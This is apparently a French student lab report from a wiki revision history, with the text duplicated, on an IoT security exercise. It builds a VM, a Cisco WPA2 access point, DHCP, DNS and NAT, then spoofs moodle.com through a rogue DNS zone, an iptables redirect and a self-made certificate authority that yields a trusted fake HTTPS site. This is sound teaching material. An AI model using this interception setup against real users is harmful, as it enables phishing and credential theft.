SE5 IdO sécurité des objets 2025/2026 b1

2025-10-07T16:59:53Z

Vdetrez :

Fichier:1107px-Titre page.png

2025-10-07T16:59:43Z

Vdetrez :

SE5 IdO sécurité des objets 2025/2026 b1

2025-10-07T16:58:10Z

Vdetrez :

[[Fichier:Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre un place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur du mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routé est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur à accès à internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de coté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur cisco, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>.La première étape fut la création du ssid <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin on mets en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici ce sera le merveilleux <code>moodle.com</code>

D'abord on modifie /etc/bind/named.conf.local<syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis on créer la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes:

<code>sudo named-checkconf</code>

<code>sudo named-checkzone exemple.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vert un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis on configure apache2
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommé CertiFiable:

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis on vient générer une demande de signature de certificat:

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>Puis on vient signer le site avec le certificat de CertiFiable:

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sur le faux Moodle mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée:

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposé est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai du prendre une autre iso car celle du site était inaccessible).

J'ai installer <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solution avant que la VM ne crash d'elle même et soit impossible à redémarrer...

La premier est toute simple, connecter la Zabeth directement au wifi, ce qui est difficile à distance. La seconde, qui est je pense possible, changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait:

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

Fichier:Titre page.png

2025-10-07T16:57:28Z

Vdetrez :

SE5 IdO sécurité des objets 2025/2026 b1

2025-10-07T16:40:12Z

Vdetrez :

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre un place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur du mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routé est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur à accès à internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de coté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur cisco, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>.La première étape fut la création du ssid <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin on mets en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici ce sera le merveilleux <code>moodle.com</code>

D'abord on modifie /etc/bind/named.conf.local<syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis on créer la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes:

<code>sudo named-checkconf</code>

<code>sudo named-checkzone exemple.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vert un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis on configure apache2
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommé CertiFiable:

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis on vient générer une demande de signature de certificat:

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>Puis on vient signer le site avec le certificat de CertiFiable:

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sur le faux Moodle mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée:

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposé est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai du prendre une autre iso car celle du site était inaccessible).

J'ai installer <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solution avant que la VM ne crash d'elle même et soit impossible à redémarrer...

La premier est toute simple, connecter la Zabeth directement au wifi, ce qui est difficile à distance. La seconde, qui est je pense possible, changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait:

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]